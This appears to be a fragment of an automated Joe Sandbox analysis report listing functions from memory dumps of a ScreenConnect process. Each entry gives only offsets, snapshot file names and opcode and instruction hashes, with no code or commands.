Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeccd4ca21809e4eceecaa877d335851b763980ae9cf2a47672c9238dd2b947c
Instruction ID: 41ad10adbec1865e3b9657005464e709b60c47cb79704bb280a4835086a1d070
Opcode Fuzzy Hash: aeccd4ca21809e4eceecaa877d335851b763980ae9cf2a47672c9238dd2b947c
Instruction Fuzzy Hash: 9921FC70A007458FC724DF6AD944A6ABBF5FF48310B208B6DD4A6876A5DB70F906CF81

Function 00BE8C30 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e39e7170603442d629eaa7ec8656db40d88326a47fecb52b9ddbbb20320332d7
Instruction ID: 71b9255d72914ab55d531d958f70340da013f07671ce7262534a7e8f6945422f
Opcode Fuzzy Hash: e39e7170603442d629eaa7ec8656db40d88326a47fecb52b9ddbbb20320332d7
Instruction Fuzzy Hash: F211B271B002055FCB00EB68DA4276EB7E6EFC5310F108529E51AAF399DF70AE0587E2

Function 042DDB8A Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 016d8d02499a84df77f0605c2e24e724a60e4b2b3661970f972be056a93a56b1
Instruction ID: 54faa42628502d16b29cd73f146edc9d14fecb606c60940e61a4c9ee947e6c49
Opcode Fuzzy Hash: 016d8d02499a84df77f0605c2e24e724a60e4b2b3661970f972be056a93a56b1
Instruction Fuzzy Hash: 6711D071F355169BDB148FA0DC94BBEBBB1FF44310F00412AE802A3290EBB46806CB54

Function 00BEE1A8 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b3649c3c4396b9495f9cd1381bc2789561cf3b0826add0e7fae2cb3ea25e11b
Instruction ID: 5f84592b1582e67f13ca1f9ed043c127e4ecef7fffc3ba664be7c35948e0931b
Opcode Fuzzy Hash: 7b3649c3c4396b9495f9cd1381bc2789561cf3b0826add0e7fae2cb3ea25e11b
Instruction Fuzzy Hash: D7114F71B002099FCB00DB69D9819AEBBF5FF88310B10856AE529AB355DB71ED05CBA1

Function 042DFE10 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bedf1a4b4bd78cfa04a3386be01c7662a5acb301ea44e230603d48e6be004c6
Instruction ID: 172e7a80bbacc7d620012f2a81a75f44bf26d378f66d85090bffdf693b6b8ecc
Opcode Fuzzy Hash: 4bedf1a4b4bd78cfa04a3386be01c7662a5acb301ea44e230603d48e6be004c6
Instruction Fuzzy Hash: BA119D35B102048FCB24DFA0C998AEEBBF2EB8C310F194069D806E7252DB346C42CB64

Function 00BE91A8 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c37bf5058f5f33be5f2480fdccd21f37c16577b022919a7fa8858daf82bc41d2
Instruction ID: 3074e41ac250fab176ae929a9a2a3e28504b45077b9f64c64f347d2d4bbf0df0
Opcode Fuzzy Hash: c37bf5058f5f33be5f2480fdccd21f37c16577b022919a7fa8858daf82bc41d2
Instruction Fuzzy Hash: 8211CE71E40245AFDB25CA6AD840AEEB7F6EFC1310B18C5A6E514DB254E7729A06CB80

Function 042DE070 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70693abbcd614b07c47702d4e3a50b22b09a559b83a85d7cbab29af1d91821cf
Instruction ID: 17bf8b911baed523e78d41cf2246d9f8a5efdef2495615aca6cbdc73b1081ce4
Opcode Fuzzy Hash: 70693abbcd614b07c47702d4e3a50b22b09a559b83a85d7cbab29af1d91821cf
Instruction Fuzzy Hash: F41180352012009FD706DB2ADCD0B16BBE9FFC9314B18856AD549CBB56CB34A853CBA5

Function 042DAB30 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdf66a8718ac9ac893a52a4f2c67eb44b234f6e59ff8ca6db59e1af84ad7b926
Instruction ID: 5fe494f4a177ca576b79be2880397e170db5394fa84afcb663be4d75b62a7352
Opcode Fuzzy Hash: bdf66a8718ac9ac893a52a4f2c67eb44b234f6e59ff8ca6db59e1af84ad7b926
Instruction Fuzzy Hash: 2E112930B102099FCB04DFA4D858BAEBBF6FF98350F144069D402A7251DB74AD42CBA0

Function 00ADD683 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3504427662.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_add000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 3759e39e24d91b49b59f4da6b15d2b24e7a5e8bbf725bed33ccf22018e3f2000
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: C111B176504280CFCB16CF10D5C4B16BF71FB94314F24C5AAD80A0B656C336D85ACBA2

Function 00BE8AA0 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f4ef4f90a5141ff38645469788e1cfa19dd5a3bc391b725155fb7aba0b94d28
Instruction ID: 77c8846d8cf16679db13c1850f444e0eea7c120a4380acafc9eef653828a590a
Opcode Fuzzy Hash: 9f4ef4f90a5141ff38645469788e1cfa19dd5a3bc391b725155fb7aba0b94d28
Instruction Fuzzy Hash: 8A116035A4020A9FCF01DFA8C9809DEBBF5EF49304B148566E904FF261D735AA0ACB90

Function 00BE4E44 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0814949fa7e22073e9d530e972cf506be29dd3fa39f55a8f001a011e95882393
Instruction ID: 91940a623e82ce7277ad6e512343f1f3e87e37ea371cb180f35a5ea03e9aeee0
Opcode Fuzzy Hash: 0814949fa7e22073e9d530e972cf506be29dd3fa39f55a8f001a011e95882393
Instruction Fuzzy Hash: 432133B28006598FCB20CF9AD444ADEFBF4EB48324F10846AD959A7210D378A945CFA5

Function 042DFE20 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b40dba7bb8bbe2be1bb7b1a8b95b1394ecc7c9473f372d404d5d13eb53f3e71
Instruction ID: a61c4a66d7567edb020b695d9916f9ed07d79868ac281550d1be325fc4752bf5
Opcode Fuzzy Hash: 0b40dba7bb8bbe2be1bb7b1a8b95b1394ecc7c9473f372d404d5d13eb53f3e71
Instruction Fuzzy Hash: 47114C35B10209DFCB24DFA4D948AAEBBF6AB8C350F194029D806E3751DB34AD41CB64

Function 042DAB2F Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77b48800e347f50c4ecf967aeea0534041b8005b92addada0ed4b16b9a1a3f12
Instruction ID: 4ff1d22303b3927066f6dac00a8224a84545f572a77e1e6f4aae6aa047c47fe4
Opcode Fuzzy Hash: 77b48800e347f50c4ecf967aeea0534041b8005b92addada0ed4b16b9a1a3f12
Instruction Fuzzy Hash: 1D110730B102099FDB04DFA4D858BAEBBF6FF98350F14446AD406E7291DB746D42DBA0

Function 00BEFA80 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c46d6dc57501d7d7229cabd2065cad729a135567f83240646ab2040827a8292
Instruction ID: d48f53e47829c76083fe625748932dc5fc9f4c0e82a91ac25e15c72507434965
Opcode Fuzzy Hash: 1c46d6dc57501d7d7229cabd2065cad729a135567f83240646ab2040827a8292
Instruction Fuzzy Hash: 67012C763401118F8704DA6EF89496EB3EAFBD9765314847BE909CB351CE32EC138754

Function 042D8090 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fb06021ddaadc8ee4eec98486cf7a38833c76a283053abc142b650425f1829c
Instruction ID: 48c3aa7e1ad37278c4cd6fe8b8013b9329faf9236edc0f61dbb0abd1bb91d015
Opcode Fuzzy Hash: 8fb06021ddaadc8ee4eec98486cf7a38833c76a283053abc142b650425f1829c
Instruction Fuzzy Hash: 92118F31B011059FEB00DF68C980AAEBBF1EF84345F04C066E958DB256C730ED42CBA1

Function 042DD350 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02f2ab60cff583a331fdf8ef7301d14f02ec2516b3164a30d38ace8a4518943d
Instruction ID: 56d5f22ee2d6fcd638bdf48f29e31dc4c49dec957e038484f8b82f519e1543ab
Opcode Fuzzy Hash: 02f2ab60cff583a331fdf8ef7301d14f02ec2516b3164a30d38ace8a4518943d
Instruction Fuzzy Hash: 1911C272A502009BEB00DB38D5566DEBBF6DB84304F14483DD002EB344DA75BD068B90

Function 042DDD60 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d85941c4b56bd57b1d7b1f4e6c383cb2b94e2b646b241d18e124379f2f91303d
Instruction ID: af616cf21c04ecfb9a8fef419a0bae641f421428ebd61e6ebfcec5180f3ad0c1
Opcode Fuzzy Hash: d85941c4b56bd57b1d7b1f4e6c383cb2b94e2b646b241d18e124379f2f91303d
Instruction Fuzzy Hash: 7D11CE326102149FCB24CF78C855BEF7BF9AB88300F14066AE442E7294DF74A905CBA1

Function 00BE91B8 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6add5327f1fe7c9e4f3b059e5c00a40502b93f1eaec09826d995b8d84815e02c
Instruction ID: d031df76219c3e7b2ea1e4735f7dfa8caf2c74787af21b792baeae3c3cdc1505
Opcode Fuzzy Hash: 6add5327f1fe7c9e4f3b059e5c00a40502b93f1eaec09826d995b8d84815e02c
Instruction Fuzzy Hash: 7911A571E40245AFDF14CA7AD8409ABB7F6EFC4300F14C4A5D514D7254E7719D05CB90

Function 00BE8B95 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6596f38428b90330c2a0a4189fc80a40b57c9d14c4eccacd2b618504de16e22
Instruction ID: 8b3211ba95752163a0546f355f9d080d51744513cd73a0403e29c3d8f322d130
Opcode Fuzzy Hash: d6596f38428b90330c2a0a4189fc80a40b57c9d14c4eccacd2b618504de16e22
Instruction Fuzzy Hash: FC11283190008EDFCB01DFA9D9808ECBBB2EF85314B58C594E009AB169DB35ED86CB61

Function 00BECBC0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf2b74ff918e4d3beeb220f72bcb2592e47966f5294e95eec59cbfec0f7599a2
Instruction ID: fa6664e5265fc78f510f56cec630769210c3a2e5d12d0ac6d083d6d98b7ad0df
Opcode Fuzzy Hash: cf2b74ff918e4d3beeb220f72bcb2592e47966f5294e95eec59cbfec0f7599a2
Instruction Fuzzy Hash: 9511D631A4021D9FDF14EBA9D9646EDBBB1EF89310F101469E005BB3B4DB786D45CBA0

Function 042D80A0 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de6c7c88025cda60886b1e34bb9308d3967b0bc83bbf6c0f8b03bf2f0d809902
Instruction ID: 5b0885e98680687e5feef93d62aaf728932b6124e83675ee0dc7a7970d20bdde
Opcode Fuzzy Hash: de6c7c88025cda60886b1e34bb9308d3967b0bc83bbf6c0f8b03bf2f0d809902
Instruction Fuzzy Hash: D3113C31B011199FDB00DFA8C980A6EBBF6EF84355F04C065E9189B355DB30ED41CBA1

Function 042DFB41 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66cc27ab6a922c7a14cbaad6fda1fc62208bf4089ced8b6af310a89410e9a68c
Instruction ID: f111eea789521b949156f03ca0b01693b051c0ca59565c231b9456c5474eea5f
Opcode Fuzzy Hash: 66cc27ab6a922c7a14cbaad6fda1fc62208bf4089ced8b6af310a89410e9a68c
Instruction Fuzzy Hash: 8D017135B001049FC705DB58C941ADABBF6EF88310F1581A9E91ADB360DB35ED06DF60

Function 00BE8AB0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd3b7bc9bbf781b36037667666bff333c8b9ceeda379ff71b0e3fc774d3e5723
Instruction ID: ff3f034e97a31f18fa38c39dfd779aa7074342d923cecad3510c84a9fa753561
Opcode Fuzzy Hash: dd3b7bc9bbf781b36037667666bff333c8b9ceeda379ff71b0e3fc774d3e5723
Instruction Fuzzy Hash: 1E11523690020ADFCF00DFA8C9409DEBBF5FF49304B10856AE905BB261D771AA0ACB91

Function 00BED4C1 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 806dbddf19f79cfdb0d56a30524965a342fd7d1c3bd7ee75b14614d12d826ad6
Instruction ID: 6e0addd9662b97186a163465354fd49482d5704a763d71becffc2e03f7042dc1
Opcode Fuzzy Hash: 806dbddf19f79cfdb0d56a30524965a342fd7d1c3bd7ee75b14614d12d826ad6
Instruction Fuzzy Hash: 3E0171313086044FC705CB6CEC84F5ABBF5EF953A8714416AE409CB3A6D674ED06CB64

Function 042DE360 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b32baa049c3918d433d129b0a426f09a07cc2af412d2cb7e9778052c6068be51
Instruction ID: 1219064c1d27dc8535c0eedad259002604ec91f994a3058e34871b12b2d2f6de
Opcode Fuzzy Hash: b32baa049c3918d433d129b0a426f09a07cc2af412d2cb7e9778052c6068be51
Instruction Fuzzy Hash: 0101B13A7005189FCF05AB94C804DDEBBB6FF8C218F054065E506A7271DB35E916DBA1

Function 00BE8B30 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29f623f6796e1af598ba263ff85619b6daa22e5447bd665bdba587d6a1a8b5f1
Instruction ID: 03dd90a13645d99ddbf38a9226b411dc9d459b23f85be40bbba4613ea458394d
Opcode Fuzzy Hash: 29f623f6796e1af598ba263ff85619b6daa22e5447bd665bdba587d6a1a8b5f1
Instruction Fuzzy Hash: 3511AD31E0015AEFCF05DFA9D8448CDBBB2EF89310F098266E405BB655DB35A956CB90

Function 00BECBB0 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 288d51c12719c38459c08e932f2d159da7b0ce81cba0e71b7e661089efefad29
Instruction ID: 2a0d51f7eacb7b1d10d9a60d42c560f68b5ab786c19c6acbd8442521beedda71
Opcode Fuzzy Hash: 288d51c12719c38459c08e932f2d159da7b0ce81cba0e71b7e661089efefad29
Instruction Fuzzy Hash: 6F11EC319442189FDF14DFA8D954AEDBBB1EF49310F105469E005BB364DB785D45CF90

Function 042DDD70 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11943dec4b501a9f0ee07f10bb87b7a1d603937f0baf4d92af053c504f5472f1
Instruction ID: 9bfde1d2412378e2eaa2dae54d6e6f42b99ec7f13f7706361deff85962356e1a
Opcode Fuzzy Hash: 11943dec4b501a9f0ee07f10bb87b7a1d603937f0baf4d92af053c504f5472f1
Instruction Fuzzy Hash: 6A0175726106149BCB24DF68C915BEF7BF9AB8C300F14052AE142F7294DF75AD05C7A5

Function 00BEA9C8 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04fd4e89b156abbed2ef7ea0c352297053f9d360fe9670a4c405e7277b48a4fe
Instruction ID: a06d3b44e2f472ab2531985c5d0d7193a1b23e8b6a444350c1437eaf9257cee3
Opcode Fuzzy Hash: 04fd4e89b156abbed2ef7ea0c352297053f9d360fe9670a4c405e7277b48a4fe
Instruction Fuzzy Hash: B001A272B003155B8B159A5AA81446FB6EDEBC4324714497AD405CB305EFB1EC0687D0

Function 00ADD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3504427662.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_add000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d25d4955e84eaee23f8b194ae6478d54df93b877f6f2780bdda034e3f1a057f
Instruction ID: 7d7f33be928f847880a5fcd4a3492e6661e01ac704d411168ed80058773db202
Opcode Fuzzy Hash: 7d25d4955e84eaee23f8b194ae6478d54df93b877f6f2780bdda034e3f1a057f
Instruction Fuzzy Hash: 5A01DB714093409AE7105F29CD84B67BFA8EF85324F18C52BED5B5B386C279DC45C6B1

Function 00BEECB1 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 854eb63f52cf740a4b835a8423d570330c4a5e32c8bd204d84c1ed4e6b03f7fc
Instruction ID: 20dca5b095017133fe4dadf7c3e7370f3fb290ae081a77b8bdeb166988520f03
Opcode Fuzzy Hash: 854eb63f52cf740a4b835a8423d570330c4a5e32c8bd204d84c1ed4e6b03f7fc
Instruction Fuzzy Hash: 50111F70900246DFCB14DFA9C845AADBBF0EF05314F20869AE425DB262E770D555CF91

Function 00BE0E24 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3cbc8b6efcb84bf9ba8810528a3fec83067266a3d7c2b5051990517d0869dab
Instruction ID: ebcc40860fe3bb31d1184f8a9feefd810a342291e4677f4c2b8eb75cc99e88c3
Opcode Fuzzy Hash: b3cbc8b6efcb84bf9ba8810528a3fec83067266a3d7c2b5051990517d0869dab
Instruction Fuzzy Hash: F8014BA281E2E05FD703AB3989B10A17FB0DD5321435A84D7C0D1CF1B7DA18D84BD366

Function 042DD360 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bf9af8a742186dec0c8fa6cf7e39257a92698559d221ac404bd83312d08ebcf
Instruction ID: baa56c0de971989990920e3a5a6c3a0d18f3591d718ca0c4e0fc28920ebbff37
Opcode Fuzzy Hash: 8bf9af8a742186dec0c8fa6cf7e39257a92698559d221ac404bd83312d08ebcf
Instruction Fuzzy Hash: 6501B171B502059BDB04DB28D9566AEFBF6DF88310F14483EE406EB394DE71BC098B90

Function 00BEF9E0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f800b63300aff31d89458a55c44f366473d610f8b984b19cb51e5174cdc2fc56
Instruction ID: ff75b836f0c0d01c9c2dfcb6dd866f6b87516157b5ad4a1d7dc68c596c12ac4f
Opcode Fuzzy Hash: f800b63300aff31d89458a55c44f366473d610f8b984b19cb51e5174cdc2fc56
Instruction Fuzzy Hash: 4301D47134D3814FC7139B7AA96465A7FB5DF9231070884FBD099CB263DA60980AC761

Function 00ADD005 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3504427662.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_add000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ea9d0d77f31cc52f80761c48c6f2afab89959ac7c4eec2b146eb7a10d5e4870
Instruction ID: 9c25f500adb49563af441f817f87d3c1b63634c42165f5a5851886ebe767f867
Opcode Fuzzy Hash: 8ea9d0d77f31cc52f80761c48c6f2afab89959ac7c4eec2b146eb7a10d5e4870
Instruction Fuzzy Hash: 9B01526100E3C05FD7128B258C94B52BFB4EF53224F18C1DBD8898F693C2695C49C772

Function 00BEEB70 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fc4d5c370e29e0be04724c35a0fa2c378feff542710c59970f8f56cb40951c1
Instruction ID: ee0c9d15544c2e16d381e6f1a2e32e66579167d9541682bc4b7442b3500f5844
Opcode Fuzzy Hash: 3fc4d5c370e29e0be04724c35a0fa2c378feff542710c59970f8f56cb40951c1
Instruction Fuzzy Hash: DA016D316081849FC711CB1DD8A4E9A7BA9EFA9314B18809BF848CB367CA34D911CB59

Function 042DE370 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3eb8dc5b1c192594bb89ce99ffb5f3355aa4198c16603ef159892d0d9ea478c9
Instruction ID: 76defe524726c30a8c0acc5e02fe72cf31d8e0a6c52843ac15fc3e2ab155f436
Opcode Fuzzy Hash: 3eb8dc5b1c192594bb89ce99ffb5f3355aa4198c16603ef159892d0d9ea478c9
Instruction Fuzzy Hash: 9E01A2367005189FCF05ABA4C804CDDBBB6EF8C314B0540A9E60AAB270DB31E915DB91

Function 042DAC81 Relevance: .0, Instructions: 43COMMON

